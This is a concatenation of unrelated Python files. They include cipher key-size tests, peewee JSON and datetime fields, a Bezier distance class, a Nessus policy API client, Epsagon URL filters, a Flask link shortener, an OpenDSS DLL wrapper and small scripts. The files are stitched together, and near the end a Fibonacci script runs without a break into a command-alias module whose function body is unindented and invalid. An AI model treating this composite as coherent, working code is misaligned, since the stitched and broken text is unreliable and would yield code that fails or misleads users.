        cipher = AES(binascii.unhexlify(key))
        assert cipher.key_size == keysize

    def test_invalid_key_size(self):
        # 6-byte key is not a valid AES key length.
        with pytest.raises(ValueError):
            AES(binascii.unhexlify(b"0" * 12))
class TestCamellia(object):
    """Camellia algorithm object: key_size reporting and validation."""

    @pytest.mark.parametrize(("key", "keysize"), [
        (b"0" * 32, 128),
        (b"0" * 48, 192),
        (b"0" * 64, 256),
    ])
    def test_key_size(self, key, keysize):
        cipher = Camellia(binascii.unhexlify(key))
        assert cipher.key_size == keysize

    def test_invalid_key_size(self):
        with pytest.raises(ValueError):
            Camellia(binascii.unhexlify(b"0" * 12))
class TestTripleDES(object):
    """TripleDES: key_size is always reported as 192 bits regardless of
    whether a 1-, 2-, or 3-key bundle is supplied."""

    @pytest.mark.parametrize("key", [
        b"0" * 16,
        b"0" * 32,
        b"0" * 48,
    ])
    def test_key_size(self, key):
        cipher = TripleDES(binascii.unhexlify(key))
        assert cipher.key_size == 192

    def test_invalid_key_size(self):
        with pytest.raises(ValueError):
            TripleDES(binascii.unhexlify(b"0" * 12))
class TestBlowfish(object):
    """Blowfish: every key size from 32 to 448 bits in 8-bit steps."""

    @pytest.mark.parametrize(("key", "keysize"), [
        (b"0" * (keysize // 4), keysize) for keysize in range(32, 449, 8)
    ])
    def test_key_size(self, key, keysize):
        cipher = Blowfish(binascii.unhexlify(key))
        assert cipher.key_size == keysize

    def test_invalid_key_size(self):
        # 3 bytes (24 bits) is below the 32-bit minimum.
        with pytest.raises(ValueError):
            Blowfish(binascii.unhexlify(b"0" * 6))
class TestCAST5(object):
    """CAST5: every key size from 40 to 128 bits in 8-bit steps."""

    @pytest.mark.parametrize(("key", "keysize"), [
        (b"0" * (keysize // 4), keysize) for keysize in range(40, 129, 8)
    ])
    def test_key_size(self, key, keysize):
        cipher = CAST5(binascii.unhexlify(key))
        assert cipher.key_size == keysize

    def test_invalid_key_size(self):
        # 17 bytes exceeds the 128-bit maximum.
        with pytest.raises(ValueError):
            CAST5(binascii.unhexlify(b"0" * 34))
class TestARC4(object):
    """ARC4: the discrete set of supported key sizes."""

    @pytest.mark.parametrize(("key", "keysize"), [
        (b"0" * 10, 40),
        (b"0" * 14, 56),
        (b"0" * 16, 64),
        (b"0" * 20, 80),
        (b"0" * 32, 128),
        (b"0" * 48, 192),
        (b"0" * 64, 256),
    ])
    def test_key_size(self, key, keysize):
        cipher = ARC4(binascii.unhexlify(key))
        assert cipher.key_size == keysize

    def test_invalid_key_size(self):
        # 17 bytes is not in the supported set above.
        with pytest.raises(ValueError):
            ARC4(binascii.unhexlify(b"0" * 34))
class TestIDEA(object):
    """IDEA: fixed 128-bit key."""

    def test_key_size(self):
        cipher = IDEA(b"\x00" * 16)
        assert cipher.key_size == 128

    def test_invalid_key_size(self):
        with pytest.raises(ValueError):
            IDEA(b"\x00" * 17)
class TestSEED(object):
    """SEED: fixed 128-bit key."""

    def test_key_size(self):
        cipher = SEED(b"\x00" * 16)
        assert cipher.key_size == 128

    def test_invalid_key_size(self):
        with pytest.raises(ValueError):
            SEED(b"\x00" * 17)
def test_invalid_backend():
    """A backend lacking the cipher interface must raise UnsupportedAlgorithm."""
    pretend_backend = object()
    with raises_unsupported_algorithm(_Reasons.BACKEND_MISSING_INTERFACE):
        # Bug fix: the mode argument must be a mode *instance*; the original
        # passed the bare ECB class, which only went unnoticed because the
        # backend interface check raises before the mode is inspected.
        ciphers.Cipher(AES(b"AAAAAAAAAAAAAAAA"), ECB(), pretend_backend)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
class Settings:
    """Application settings persisted as a small JSON document."""

    SETTINGS_FILE_NAME = 'settings.json'

    def __init__(self):
        # Output directory path.
        self.dst_dir_path = ''
        # Image width at mdpi density.
        self.mdpi_image_width = 24
        # Foreground color (empty string means "do not fill").
        self.fg_color_str = ''

    def save(self, file_path):
        """Serialize the current settings to *file_path* as JSON."""
        payload = {
            'dstDirPath': self.dst_dir_path,
            'mdpiImageWidth': self.mdpi_image_width,
            'fgColorStr': self.fg_color_str,
        }
        with open(file_path, 'w') as f:
            json.dump(payload, f)

    def load(self, file_path):
        """Populate this instance from the JSON file at *file_path*."""
        with open(file_path, 'r') as f:
            payload = json.load(f)
        self.dst_dir_path = payload['dstDirPath']
        self.mdpi_image_width = payload['mdpiImageWidth']
        self.fg_color_str = payload['fgColorStr']
|
import json
import datetime
import peewee as pw
import pendulum
def patch_datetime_type():
    """Widen peewee's DATETIME column mappings for timezone/precision support."""
    # MySQL: DATETIME(6) keeps microsecond precision.
    pw.MySQLDatabase.field_types.update({'DATETIME': 'DATETIME(6)'})
    # PostgreSQL: TIMESTAMPTZ stores timezone-aware timestamps.
    pw.PostgresqlDatabase.field_types.update({'DATETIME': 'TIMESTAMPTZ'})


# Applied at import time so every model defined afterwards uses the
# patched column types.
patch_datetime_type()
class DatetimeTZField(pw.Field):
    """peewee field storing timezone-aware datetimes; values are normalized
    to UTC on write and returned as pendulum datetimes on read."""
    field_type = 'DATETIME'

    def python_value(self, value):
        """Convert a DB-side value into a pendulum datetime (pass through
        anything that is neither a string nor a datetime)."""
        if isinstance(value, str):
            return pendulum.parse(value)
        if isinstance(value, datetime.datetime):
            return pendulum.instance(value)
        return value

    def db_value(self, value):
        """Validate the value is a tz-aware datetime and convert it to UTC."""
        if value is None:
            return value
        if not isinstance(value, datetime.datetime):
            raise ValueError('datetime instance required')
        if value.utcoffset() is None:
            raise ValueError('timezone aware datetime required')
        if isinstance(value, pendulum.DateTime):
            # Rebuild as a plain datetime before handing it to the DB driver;
            # presumably avoids pendulum-subclass quirks -- TODO confirm.
            value = datetime.datetime.fromtimestamp(
                value.timestamp(), tz=value.timezone)
        return value.astimezone(datetime.timezone.utc)
class JSONCharField(pw.CharField):
    """CharField that transparently (de)serializes its value as JSON."""

    def __init__(self, ensure_ascii=True, *args, **kwargs):
        # Controls json.dumps escaping of non-ASCII characters.
        self.ensure_ascii = ensure_ascii
        super(JSONCharField, self).__init__(*args, **kwargs)

    def db_value(self, value):
        """Serialize to JSON, enforcing the column's max_length."""
        if value is None:
            return value
        serialized = json.dumps(value, ensure_ascii=self.ensure_ascii)
        if len(serialized) > self.max_length:
            raise ValueError('Data too long for field {}.'.format(self.name))
        return serialized

    def python_value(self, value):
        """Deserialize the stored JSON string (None passes through)."""
        return value if value is None else json.loads(value)
|
import numpy as np
# Bezier Class representing a CUBIC bezier defined by four
# control points.
#
# at(t): gets a point on the curve at t
# distance2(pt) returns the closest distance^2 of
# pt and the curve
# closest(pt) returns the point on the curve
# which is closest to pt
# maxes(pt) plots the curve using matplotlib
class Bezier(object):
    """CUBIC bezier curve defined by four control points.

    at(t):         point(s) on the curve at parameter t
    distance2(pt): squared distance from pt to the closest curve point
    closest(pt):   point on the curve closest to pt
    plot(maxes):   draw the curve on a matplotlib axes
    """
    # Exponent tables for evaluating the cubic and its derivatives.
    exp3 = np.array([[3, 3], [2, 2], [1, 1], [0, 0]], dtype=np.float32)
    exp3_1 = np.array([[[3, 3], [2, 2], [1, 1], [0, 0]]], dtype=np.float32)
    exp4 = np.array([[4], [3], [2], [1], [0]], dtype=np.float32)
    # Parameter range of the clipped curve; always candidate closest points.
    boundaries = np.array([0, 1], dtype=np.float32)

    def __init__(self, points):
        """points: (4, 2) float32 ndarray of control points."""
        assert isinstance(points, np.ndarray)
        assert points.dtype == np.float32
        self.points = points
        self.create_coefficients()

    def create_coefficients(self):
        """Convert the control points to power-basis coefficients, so that
        f(t) = a * t^3 + b * t^2 + c * t + d
        (coefficients have the same dimensions as the control points)."""
        co_coeffs = np.array(
            [[-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0]],
            dtype=np.float32)
        # Bug fix: the original referenced the *global* name ``points`` here,
        # which only worked when a module-level ``points`` variable happened
        # to exist (as it does in the __main__ demo).
        coeffs = np.multiply(co_coeffs.reshape((4, 4, 1)),
                             self.points.reshape((1, 4, 2)))
        self.coeffs = np.sum(coeffs, axis=1).reshape(-1, 4, 2)

    def at(self, t):
        """Return point(s) on the curve at parameter value(s) t."""
        if type(t) != np.ndarray:
            t = np.array(t)
        pts = self.coeffs * np.power(t, self.exp3_1)
        return np.sum(pts, axis=1)

    def distance2(self, pt):
        """Return the closest squared distance between pt and the curve."""
        points, distances, index = self.measure_distance(pt)
        return distances[index]

    def closest(self, pt):
        """Return the point on the curve closest to pt."""
        points, distances, index = self.measure_distance(pt)
        return points[index]

    def measure_distance(self, pt):
        """Find candidate closest points on the curve for pt.

        Steps: (1) define the squared distance D(t) = (f(t) - pt)^2;
        (2) the roots of D'(t) are its extremes — keep the real roots in
        (0, 1) that look like minima (D''(root) >= 0); (3) compare those
        against the curve's start and end points and return
        (candidate points, their squared distances, index of the closest).

        Helpful visualization: https://www.desmos.com/calculator/ktglugn1ya
        """
        coeffs = self.coeffs
        # Coefficients of D'(t) (degree 5) and D''(t) (degree 4).
        da = 6 * np.sum(coeffs[0][0] * coeffs[0][0])
        db = 10 * np.sum(coeffs[0][0] * coeffs[0][1])
        dc = 4 * (np.sum(coeffs[0][1] * coeffs[0][1]) + 2 * np.sum(coeffs[0][0] * coeffs[0][2]))
        dd = 6 * (np.sum(coeffs[0][0] * (coeffs[0][3] - pt)) + np.sum(coeffs[0][1] * coeffs[0][2]))
        de = 2 * (np.sum(coeffs[0][2] * coeffs[0][2])) + 4 * np.sum(coeffs[0][1] * (coeffs[0][3] - pt))
        df = 2 * np.sum(coeffs[0][2] * (coeffs[0][3] - pt))
        dda = 5 * da
        ddb = 4 * db
        ddc = 3 * dc
        ddd = 2 * dd
        dde = de
        dcoeffs = np.stack([da, db, dc, dd, de, df])
        ddcoeffs = np.stack([dda, ddb, ddc, ddd, dde]).reshape(-1, 1)
        # Real extremes of D(t): roots of its first derivative.
        extrema = Bezier.np_real_roots(dcoeffs)
        # Keep only minima inside the clipped parameter range (0, 1).
        dd_clip = (np.sum(ddcoeffs * np.power(extrema, self.exp4)) >= 0) & (extrema > 0) & (extrema < 1)
        minima = extrema[dd_clip]
        # The curve endpoints are always candidates.
        potentials = np.concatenate((minima, self.boundaries))
        points = self.at(potentials.reshape(-1, 1, 1))
        distances = np.sum(np.square(points - pt), axis=1)
        index = np.argmin(distances)
        return points, distances, index

    def plot(self, maxes):
        """Draw the curve and its control polygon on a matplotlib axes."""
        import matplotlib.path as mpath
        import matplotlib.patches as mpatches
        Path = mpath.Path
        pp1 = mpatches.PathPatch(
            Path(self.points, [Path.MOVETO, Path.CURVE4, Path.CURVE4, Path.CURVE4]),
            fc="none")
        pp1.set_alpha(1)
        pp1.set_color('#00cc00')
        pp1.set_fill(False)
        pp2 = mpatches.PathPatch(
            Path(self.points, [Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO]),
            fc="none")
        pp2.set_alpha(0.2)
        pp2.set_color('#666666')
        pp2.set_fill(False)
        maxes.scatter(*zip(*self.points), s=4, c=((0, 0.8, 1, 1), (0, 1, 0.5, 0.8), (0, 1, 0.5, 0.8),
                                                  (0, 0.8, 1, 1)))
        maxes.add_patch(pp2)
        maxes.add_patch(pp1)

    @staticmethod
    def np_real_roots(coefficients, EPSILON=1e-6):
        """np.roots, discarding roots with a non-negligible imaginary part.

        Bug fix: the original declared ``self`` as the first parameter of a
        @staticmethod, so the call Bezier.np_real_roots(dcoeffs) bound the
        coefficients to ``self`` and raised TypeError.
        """
        r = np.roots(coefficients)
        return r.real[abs(r.imag) < EPSILON]
if __name__ == '__main__':
    import math

    def matplotlib_example(bez, use_text):
        """Interactive demo: click near the curve to see its closest point."""
        import matplotlib.pyplot as plt
        import matplotlib.path as mpath
        import matplotlib.patches as mpatches

        def onclick(event):
            if event.inaxes is None:
                return
            # Bug fix: np.float / np.int were removed from NumPy (>= 1.20);
            # the builtins float/int are exactly what they aliased.
            pt = np.array((event.xdata, event.ydata), dtype=float)
            print("pt", pt)
            points, distances, index = bez.measure_distance(pt)
            closest = points[index]
            distance = math.floor(distances[index])
            Path = mpath.Path
            pp1 = mpatches.PathPatch(Path([pt, closest], [Path.MOVETO, Path.LINETO]), fc="none")
            pp1.set_color("#95a7df")
            ax.add_patch(pp1)
            ax.scatter(*pt, s=32, facecolors='none', edgecolors='b')
            if use_text:
                ax.text(*((pt + closest) / 2), str(distance))
                ax.text(*pt, str(pt.astype(int)))
                ax.text(*closest, str(closest.astype(int)))
            fig.canvas.draw()
            return None

        fig, ax = plt.subplots()
        cid = fig.canvas.mpl_connect('button_press_event', onclick)
        ax.grid()
        ax.axis('equal')
        ax.margins(0.4)
        bez.plot(ax)
        plt.title("Click next to the curve.")
        plt.show()

    def opencv_example(bez, shape, fac=3):
        """Render the curve's squared-distance field as a grayscale image."""
        img = np.zeros(shape, dtype=float)
        for y in range(img.shape[0]):
            for x in range(img.shape[1]):
                img[y, x] = bez.distance2((x, y))
            print(y, "/", shape[0])
        import cv2
        # Cube root compresses the dynamic range for display.
        img = np.power(img, 1 / 3)
        img = ((1 - (img / np.max(img))) * 255).astype(np.uint8)
        img = np.flip(img, axis=0)
        resized_image = cv2.resize(img, (shape[1] * fac, shape[0] * fac), interpolation=cv2.INTER_NEAREST)
        cv2.imshow("distance", resized_image)
        cv2.waitKey(1)

    # Create a Bezier object with four control points. (The original nested
    # a second, always-true __name__ guard here; it was redundant and has
    # been removed.)
    points = np.array([[0, 0], [0, 1], [1, .8], [1.5, 1]]).astype(np.float32)
    points *= 50
    points += 10
    bez = Bezier(points)
    opencv_example(bez, shape=(80, 110))
    matplotlib_example(bez, use_text=False)
|
'''
Policies
========
Methods described in this section relate to the policies API.
These methods can be accessed at ``Nessus.policies``.
.. rst-class:: hide-signature
.. autoclass:: PoliciesAPI
:members:
'''
from io import BytesIO
from typing import Optional, Dict, List
from tenable.base.endpoint import APIEndpoint
class PoliciesAPI(APIEndpoint):  # noqa PLC0115
    # All endpoints below are relative to this path on the Nessus API.
    _path = 'policies'

    def copy(self, policy_id: int) -> Dict:
        '''
        Duplicates an existing scan policy.
        Args:
            policy_id (int): The id of the policy to clone.
        Returns:
            Dict:
                The cloned policy object.
        Example:
            >>> nessus.policies.copy(1)
        '''
        return self._post(f'{policy_id}/copy')

    def create(self, uuid: str, **kwargs) -> Dict:
        '''
        Creates a new scan policy using the provided settings.
        Args:
            uuid (str): The UUID for the editor template to use.
            **kwargs (dict): Additional settings to use to create the policy.
        Returns:
            Dict:
                Response object with identifying information on the new policy
        Example:
            >>> tmpl = '731a8e52-3ea6-a291-ec0a-d2ff0619c19d7bd788d6be818b65'
            >>> nessus.policies.create(tmpl_uuid, settings={
            ...     'name': 'Sample Policy'
            ... })
        '''
        # The template UUID travels in the same JSON body as the settings.
        kwargs['uuid'] = uuid
        return self._post(json=kwargs)

    def delete(self, policy_id: int) -> None:
        '''
        Deletes the specified scan policy.
        Args:
            policy_id (int): The id of the policy to delete.
        Example:
            >>> nessus.policies.delete(1)
        '''
        return self._delete(f'{policy_id}')

    def delete_many(self, policy_ids: List[int]) -> List[int]:
        '''
        Deletes the specified scan policies.
        Args:
            policy_ids (list[int]): The list of policy ids to delete.
        Returns:
            List[int]:
                The ids reported as deleted by the API.
        Example:
            >>> nessus.policies.delete_many([1, 2, 3])
        '''
        return self._delete(json={'ids': policy_ids})['deleted']

    def details(self, policy_id: int) -> Dict:
        '''
        Returns the details of the selected policy.
        Args:
            policy_id (int): The id of the policy to retrieve.
        Returns:
            Dict:
                The policy object.
        Example:
            >>> nessus.policies.details(1)
        '''
        return self._get(f'{policy_id}')

    def edit(self, policy_id: int, **kwargs) -> None:
        '''
        Updates an existing scan policy.
        Args:
            policy_id (int): The id of the policy to edit.
            **kwargs (dict): Attributes to be passed into the JSON body.
        Example:
            >>> policy = nessus.policies.details(1)
            >>> policy['settings']['name'] = 'Updated Policy'
            >>> nessus.policies.edit(1, **policy)
        '''
        return self._put(f'{policy_id}', json=kwargs)

    def import_policy(self, fobj: BytesIO) -> Dict:
        '''
        Imports the policy into the nessus scanner.
        Args:
            fobj (BytesIO): The file object containing the policy.
        Returns:
            Dict:
                The imported policy object.
        Example:
            >>> with open('policy.xml', 'rb') as policy:
            ...     nessus.policies.import_policy(policy)
        '''
        # The file is uploaded first; the import call references it by name.
        filename = self._api.files.upload(fobj)
        return self._post('import', json={'file': filename})

    def export_policy(self,
                      policy_id: int,
                      fobj: Optional[BytesIO] = None,
                      **kwargs
                      ) -> BytesIO:
        '''
        Export the specified policy and download it.
        Args:
            policy_id (int): The id of the policy to export.
            fobj (BytesIO, optional):
                The file object to write the exported file to.  If none is
                specified then a BytesIO object is written to in memory.
            chunk_size (int, optional):
                The chunk sizing for the download itself.
            stream_hook (callable, optional):
                Overload the default downloading behavior with a custom
                stream hook.
            hook_kwargs (dict, optional):
                keyword arguments to pass to the stream_hook callable in
                addition to the default passed params.
        Returns:
            BytesIO:
                The file object the export was written to.
        '''
        kwargs['fobj'] = fobj
        # Two-step download: prepare an export token, then fetch it.
        token = self._get(f'{policy_id}/export/prepare')['token']
        return self._api.tokens._fetch(token, **kwargs)  # noqa PLW0212

    def list(self,) -> List[Dict]:
        '''
        Lists the available policies.
        Returns:
            List[Dict]:
                List of policy objects.
        Example:
            >>> for policy in nessus.policies.list():
            ...     print(policy)
        '''
        return self._get()['policies']
|
"""
Utils for web frameworks request filters.
"""
from six.moves import urllib
from epsagon.trace import trace_factory
from epsagon.constants import IGNORED_ENDPOINTS
# Ignored content types for web frameworks.
IGNORED_CONTENT_TYPES = [
    'image',
    'audio',
    'video',
    'font',
    'zip',
    'css',
]
# Static-asset file extensions whose requests are ignored.
IGNORED_FILE_TYPES = [
    '.js',
    '.jsx',
    '.woff',
    '.woff2',
    '.ttf',
    '.eot',
    '.ico',
]
# Method to URL dict. Each key is an unbound str predicate applied as
# method(netloc, pattern); a match means the URL is blacklisted.
BLACKLIST_URLS = {
    str.endswith: [
        'epsagon.com',
        '.amazonaws.com',
    ],
    str.__contains__: [
        'accounts.google.com',
        'documents.azure.com',
        '169.254.170.2'  # AWS Task Metadata Endpoint
    ],
}
# Whitelist checked before the blacklist: AWS service URLs that should
# always be traced even though they match '.amazonaws.com' above.
WHITELIST_URL = {
    str.__contains__: [
        '.execute-api.',
        '.elb.amazonaws.com',
        '.appsync-api.',
    ],
}
def is_blacklisted_url(url):
    """
    Return whether the URL is blacklisted, checking the whitelist first.
    :param url: url string
    :return: True if URL is blacklisted, else False
    """
    netloc = urllib.parse.urlparse(url).netloc
    for matcher, patterns in WHITELIST_URL.items():
        if any(matcher(netloc, pattern) for pattern in patterns):
            return False
    for matcher, patterns in BLACKLIST_URLS.items():
        if any(matcher(netloc, pattern) for pattern in patterns):
            return True
    return False
def is_payload_collection_blacklisted(url):
    """
    Return whether payload collection is disabled for this URL, per the
    trace's configured url_patterns_to_ignore.
    :param url: url string
    :return: True if URL is blacklisted, else False
    """
    netloc = urllib.parse.urlparse(url).netloc
    ignored_patterns = trace_factory.get_trace().url_patterns_to_ignore
    return any(pattern in netloc for pattern in ignored_patterns)
def ignore_request(content, path):
    """
    Return True if an HTTP request in a web framework should be omitted,
    based on its accept mimetype or its static-asset file extension.
    :param content: accept mimetype header
    :param path: request path
    :return: Bool
    """
    if any(ctype in content for ctype in IGNORED_CONTENT_TYPES):
        return True
    return any(path.endswith(ext) for ext in IGNORED_FILE_TYPES)
def add_ignored_endpoints(endpoints):
    """
    Extend the global list of ignored endpoints.
    :param endpoints: list of endpoints or None
    :return: None
    """
    if not endpoints:
        return
    IGNORED_ENDPOINTS.extend(endpoints)
def is_ignored_endpoint(endpoint):
    """
    return true if endpoint should be ignored.
    :param endpoint: endpoint path
    :return: Bool
    """
    # Exact-match lookup only; prefix/pattern matching is not supported here.
    return endpoint in IGNORED_ENDPOINTS
|
from flask import Flask, request, render_template, abort
from db import *
from random import choice
import string
import requests
app = Flask(__name__)
# Characters slugs are drawn from: [A-Za-z0-9].
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits

# Browser-like headers for the reachability probe in the index view.
HEADERS = {
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "Accept": "text/html;q=0.9,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "close",
    "DNT": "1",
    "Upgrade-Insecure-Requests": "1"
}


def generate_slug(length):
    """Return a random slug of *length* characters drawn from ALPHABET.

    Bug fix: the original hard-coded ``range(5)`` and ignored the ``length``
    argument, so generate_slug(6) silently produced 5-character slugs.
    """
    return "".join(choice(ALPHABET) for _ in range(length))
@app.route("/", methods=["GET", "POST"])
def main():
    """Landing page: on POST, validate the submitted URL, probe it, and
    create a short slug for it."""
    if request.method == "POST":
        link = request.form.get("link")
        if link is None:
            return render_template("main.html", error="Fill in the URL")
        if not link.startswith("http://") and not link.startswith("https://"):
            link = "http://" + link
        try:
            # Best-effort reachability probe; very short timeout by design.
            requests.head(link, headers=HEADERS, timeout=0.05)
        except requests.RequestException:
            # Bug fix: the original bare ``except:`` also swallowed
            # KeyboardInterrupt/SystemExit; only network-level failures
            # should mark the URL as unreachable.
            return render_template("main.html", error="Page does not exist")
        short_link = generate_slug(6)
        Link.create(
            id=short_link,
            url=link
        )
        return render_template("main.html", short_link=short_link)
    return render_template("main.html")
@app.route("/<slug>")
def follow(slug):
    """Resolve *slug* to its stored URL and show the pre-roll page,
    or a 404 page for unknown slugs."""
    try:
        link = Link.get(Link.id == slug)
    except Link.DoesNotExist:
        return render_template("unknown.html"), 404
    return render_template("preroll.html", page=link.url)


if __name__ == '__main__':
    app.run()
|
import graphene
from graphene_django import DjangoObjectType
from .models import Post
class PostType(DjangoObjectType):
    """GraphQL type for Post rows; the image field resolves to a URL."""
    class Meta:
        model = Post
        fields = ('id', 'title', 'description', 'image')

    def resolve_image(self, info):
        # Serves the pre-generated "large" thumbnail URL rather than the
        # original upload -- assumes a thumbnails-enabled image field;
        # TODO confirm which thumbnail backend provides .thumbnails.large.
        return self.image.thumbnails.large.url
class Query(graphene.ObjectType):
    """Root GraphQL query exposing posts."""
    posts = graphene.List(PostType)
    post = graphene.Field(PostType, id=graphene.Int())

    @staticmethod
    def resolve_posts(root, info):
        """Return every Post row (no pagination or filtering)."""
        return Post.objects.all()

    @staticmethod
    def resolve_post(root, info, id):
        """Return a single Post by primary key.

        NOTE(review): raises Post.DoesNotExist for unknown ids — confirm
        whether returning None is the desired GraphQL behavior.
        """
        return Post.objects.get(pk=id)
|
from .kitti_dataset import KITTIRAWDataset, KITTIOdomDataset, KITTIDepthDataset
from .mc_dataset import MCDataset
|
# -*- coding: iso-8859-15 -*-
import ctypes
import json
import os
import pathlib
from . import ActiveClass, Bus, CapControls, Capacitors, Circuit, CktElement, CMathLib, CtrlQueue, DSSElement
from . import DSSExecutive, DSSInterface, DSSProgress, DSSProperties, ErrorOpenDSS, Fuses, Generators, ISources
from . import LineCodes, Lines, Loads, LoadShapes, Meters, Monitors, Parallel, Parser, PDElements, PVSystems, Reclosers
from . import Relays, RegControls, Sensors, Settings, Solution, SWTControls, Text, Topology, Transformers, VSources
from . import XYCurves
from .utils.System import System
DLL_NAME_WIN = "OpenDSSDirect.dll"
DLL_NAME_LINUX = "libopendssdirect.so"
class DSSDLL(ActiveClass, Bus, CapControls, Capacitors, Circuit, CktElement, CMathLib, CtrlQueue, DSSElement,
             DSSExecutive, DSSInterface, DSSProgress, DSSProperties, ErrorOpenDSS, Fuses, Generators, Lines, Loads,
             ISources, LineCodes, LoadShapes, Meters, Monitors, Parallel, Parser, PDElements, PVSystems, Reclosers,
             Relays, RegControls, Sensors, Settings, Solution, SWTControls, Text, Topology, Transformers, VSources,
             XYCurves):
    """ctypes-based wrapper around the OpenDSSDirect DLL.

    Each mixin base class exposes one family of the OpenDSS API; this class
    loads the shared library and configures the ctypes return types.
    """
    dll_folder: str
    dll_path: str
    my_dss_version: ctypes.c_char_p
    dss_obj: ctypes.cdll
    started = False
    # NOTE(review): these are class-level mutable lists, shared by every
    # instance of DSSDLL -- confirm a single shared command list is intended.
    memory_commands = []
    class_commands = []
    # TODO need to be able to get different dll names:
    # https://www.youtube.com/watch?v=74hCbYfdZdU&list=PLhdRxvt3nJ8x74v7XWcp6iLJL_nCOjxjK&index=9&t=2827s
    def __init__(self, dll_folder_param=None, dll_by_user=None):
        # TODO: dss_write_allowforms
        """
        Class to create an OpenDSS object
        :param dll_folder_param: None will use the OpenDSS available within the package. The dll path allows to use a
        different OpenDSS
        :param dll_by_user: file name of a specific DLL to load; None selects
        the platform default shipped with the package
        """
        self.started = False
        if dll_folder_param is not None and dll_by_user is not None:
            # Caller supplied both folder and DLL name: load exactly that file.
            # NOTE(review): os.chdir changes the process-wide working directory
            # as a side effect -- confirm the DLL's dependent libraries need it.
            os.chdir(dll_folder_param)
            self.dss_obj = ctypes.cdll.LoadLibrary(os.path.join(dll_folder_param, dll_by_user))
            self.started = True
        elif dll_by_user is None:
            # No explicit DLL: use the bundled one (or the given folder),
            # choosing the file name for the current platform/architecture.
            if dll_folder_param is None:
                dll_folder_param = os.path.join(pathlib.Path(os.path.dirname(os.path.abspath(__file__))), "dll")
            if System.detect_platform() == 'Linux':
                dll_folder_param = pathlib.Path(dll_folder_param)
                dll_by_user = DLL_NAME_LINUX
            elif System.detect_platform() == 'Windows':
                dll_folder_param = pathlib.Path(dll_folder_param)
                dll_by_user = DLL_NAME_WIN
            self.dll_path = System.get_architecture_path(dll_folder_param)
            self.dll_file_path = os.path.join(self.dll_path, dll_by_user)
            self.dss_obj = ctypes.cdll.LoadLibrary(self.dll_file_path)
            self.started = True
        # elif dll_folder_param is None and dll_by_user is not None:
        #     print("To specific a dll you MUST define the base folder")
        #     exit()
        elif dll_folder_param is not None and dll_by_user is None:
            # NOTE(review): this branch is unreachable -- every case with
            # dll_by_user is None is consumed by the elif above.
            print("Please specify a DLL in the defined folder.")
            exit()
        if self.started:
            self.load_json()
            self._allocate_memory()
            if self.check_started():
                print(
                    "OpenDSS Started successfully! \nOpenDSS {}\n\n".format(self.my_dss_version.value.decode('ascii')))
            else:
                print("OpenDSS Failed to Start")
                exit()
        else:
            print("An error occur!")
            exit()
    def check_started(self):
        """Ask the DLL whether OpenDSS is up; cache the version string on success."""
        if int(self.dss_obj.DSSI(ctypes.c_int32(3), ctypes.c_int32(0))) == 1:
            # TODO: Need refactor this call to use a method that already exists
            self.my_dss_version = ctypes.c_char_p(self.dss_obj.DSSS(ctypes.c_int32(1), "".encode('ascii')))
            return True
        else:
            return False
    def load_json(self):
        """Read configurations.json and build the `restype` assignment commands
        that _allocate_memory() later executes."""
        dir_path = os.path.dirname(os.path.realpath(__file__))
        with open(dir_path + '/' + 'configurations.json') as json_f:
            data = json.load(json_f)
            for n in data['structured_data']:
                for t in n['types']:
                    if t == 'S':
                        ctype = 'c_char_p'
                    elif t == 'F':
                        ctype = 'c_double'
                    # NOTE(review): for any type code other than 'S'/'F',
                    # `ctype` is unbound (first iteration) or stale (later
                    # iterations) -- confirm the JSON only ever contains S/F.
                    command_ = 'self.dss_obj.' + n['name'] + t + '.restype' + ' = ' + 'ctypes.' + ctype
                    self.memory_commands.append(command_)
    def _allocate_memory(self):
        """Set ctypes restype metadata for the DLL entry points."""
        self.dss_obj.DSSPut_Command.restype = ctypes.c_char_p
        self.dss_obj.DSSProperties.restype = ctypes.c_char_p
        # NOTE(review): exec of strings built in load_json -- safe only while
        # configurations.json remains trusted package data.
        for i in self.memory_commands:
            exec(i)
|
# Flat script: ask how many Fibonacci terms to show, print them separated by
# " -> ", and finish the line with "FIM".
n = int(input('Digite a quantidade de termos que você deseja saber da sequência de Fibonnaci: '))
previous, current = 0, 1
for _ in range(n):
    print('{} -> '.format(previous), end='')
    previous, current = current, previous + current
print('FIM')
from libs.config import alias, set_namespace
from libs.myapp import clean_trace
# ? The first argument of the alias decorator is none_named_arg (True/False); True means argument values passed without parameter names are forwarded in positional order
@alias(func_alias="b", _type="COMMON")
def run():
"""
back
Back to main menu.
"""
clean_trace()
set_namespace("main")
|
import sys
import os.path
# Ensure the current working directory is importable so sibling modules
# resolve when this is run as a script.
sys.path.append(os.path.curdir)
|
"""
A set of generic utilities used in bilby_pipe
"""
import re
import os
import sys
import logging
import ast
class BilbyPipeError(Exception):
    """Base exception for errors raised by bilby_pipe."""
    def __init__(self, message):
        super().__init__(message)
def get_command_line_arguments():
    """ Helper function to return the list of command line arguments
    (everything in sys.argv after the program name). """
    program_and_args = list(sys.argv)
    return program_and_args[1:]
def parse_args(input_args, parser):
    """ Parse an argument list using parser generated by create_parser()

    Parameters
    ----------
    input_args: list
        A list of arguments
    parser: argparse.ArgumentParser
        The parser with which to parse `input_args`

    Returns
    -------
    args: argparse.Namespace
        A simple object storing the input arguments
    unknown_args: list
        A list of any arguments in `input_args` unknown by the parser

    Raises
    ------
    BilbyPipeError
        If no arguments were provided
    """
    # `not input_args` also rejects None instead of raising a TypeError
    if not input_args:
        raise BilbyPipeError("No command line arguments provided")
    args, unknown_args = parser.parse_known_args(input_args)
    return args, unknown_args
def check_directory_exists_and_if_not_mkdir(directory):
    """ Checks if the given directory exists and creates it if it does not exist

    Parameters
    ----------
    directory: str
        Name of the directory
    """
    if not os.path.exists(directory):
        # exist_ok guards against the race where another process creates the
        # directory between the check above and this call
        os.makedirs(directory, exist_ok=True)
        logger.debug("Making directory {}".format(directory))
    else:
        logger.debug("Directory {} exists".format(directory))
def setup_logger(outdir=None, label=None, log_level="INFO", print_version=False):
    """ Setup logging output: call at the start of the script to use

    Parameters
    ----------
    outdir, label: str
        If supplied, write the logging output to outdir/label.log
    log_level: str, optional
        ['debug', 'info', 'warning']
